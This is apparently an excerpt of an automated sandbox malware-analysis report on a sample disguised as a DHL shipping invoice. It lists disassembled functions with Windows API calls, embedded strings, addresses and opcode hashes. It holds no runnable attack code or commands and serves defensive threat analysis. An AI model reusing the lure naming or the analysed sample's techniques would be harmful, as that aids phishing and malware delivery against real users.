                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                                      • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      • Opcode ID: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3015003838-0
